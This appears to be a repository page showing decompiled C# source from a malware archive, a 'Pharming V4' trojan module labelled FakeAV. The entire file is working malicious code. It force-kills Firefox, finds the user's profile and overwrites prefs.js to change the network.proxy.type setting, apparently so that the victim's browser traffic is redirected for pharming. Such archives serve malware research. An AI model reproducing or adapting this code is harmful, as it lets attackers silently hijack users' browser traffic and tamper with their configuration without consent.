ch0ic3/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2025-01-30 22:15:07 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity
4b9382ddbc
MalwareSourceCode/MSIL/Trojan/Win32/F/Trojan.Win32.FakeAV.msyh-d3f833cca57e8fd32da1564163086307e943e07f01fc02218e28a85509c2cfe2/firefox.cs
vxunderground f2ac1ece55 auto-decompiled msil via petikvx 
add
2022-08-18 06:28:56 -05:00

79 lines
3.1 KiB
C#
Raw Blame History

// Decompiled with JetBrains decompiler
// Type: Pharming_V4.firefox
// Assembly: Pharming V4, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 0A0AA727-6E9B-45EB-9818-CBBF4207AD4A
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan.Win32.FakeAV.msyh-d3f833cca57e8fd32da1564163086307e943e07f01fc02218e28a85509c2cfe2.exe
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.Diagnostics;
using System.IO;
namespace Pharming_V4
{
[StandardModule]
internal sealed class firefox
{
public static void firefox()
{
Process[] processesByName = Process.GetProcessesByName(nameof (firefox));
int index1 = 0;
while (index1 < processesByName.Length)
{
processesByName[index1].Kill();
checked { ++index1; }
}
string str = "";
string[] directories = Directory.GetDirectories(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\Mozilla\\Firefox\\Profiles\\");
int index2 = 0;
while (index2 < directories.Length)
{
str = directories[index2];
checked { ++index2; }
}
StreamReader streamReader = new StreamReader(str + "\\prefs.js");
string end = streamReader.ReadToEnd();
streamReader.Close();
string path = str + "\\pending.js";
if (end.Contains("user_pref(\"network.proxy.type\", 1);"))
{
StreamWriter streamWriter = new StreamWriter(path, false);
streamWriter.WriteLine(end.Replace("user_pref(\"network.proxy.type\", 1);", "user_pref(\"network.proxy.type\", 5);"));
streamWriter.Close();
}
else if (end.Contains("user_pref(\"network.proxy.type\", 2);"))
{
StreamWriter streamWriter = new StreamWriter(path, false);
streamWriter.WriteLine(end.Replace("user_pref(\"network.proxy.type\", 2);", "user_pref(\"network.proxy.type\", 5);"));
streamWriter.Close();
}
else if (end.Contains("user_pref(\"network.proxy.type\", 3);"))
{
StreamWriter streamWriter = new StreamWriter(path, false);
streamWriter.WriteLine(end.Replace("user_pref(\"network.proxy.type\", 3);", "user_pref(\"network.proxy.type\", 5);"));
streamWriter.Close();
}
else if (end.Contains("user_pref(\"network.proxy.type\", 4);"))
{
StreamWriter streamWriter = new StreamWriter(path, false);
streamWriter.WriteLine(end.Replace("user_pref(\"network.proxy.type\", 4);", "user_pref(\"network.proxy.type\", 5);"));
streamWriter.Close();
}
else if (end.Contains("user_pref(\"network.proxy.type\", 5);"))
{
StreamWriter streamWriter = new StreamWriter(path, false);
streamWriter.WriteLine(end.Replace("user_pref(\"network.proxy.type\", 5);", "user_pref(\"network.proxy.type\", 5);"));
streamWriter.Close();
}
else
{
StreamWriter streamWriter = new StreamWriter(path, false);
streamWriter.WriteLine("user_pref(\"network.proxy.type\", 5);");
streamWriter.Close();
}
File.Delete(str + "\\prefs.js");
File.Move(str + "\\pending.js", str + "\\prefs.js");
}
}
}
Reference in New Issue View Git Blame Copy Permalink